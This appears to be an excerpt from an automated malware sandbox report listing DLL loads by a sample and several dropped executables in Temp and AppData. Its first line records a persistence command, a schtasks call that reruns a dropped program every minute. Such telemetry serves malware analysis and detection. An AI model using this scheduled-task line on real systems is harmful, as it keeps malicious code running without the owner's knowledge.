Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F

Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Section loaded: userenv.dll
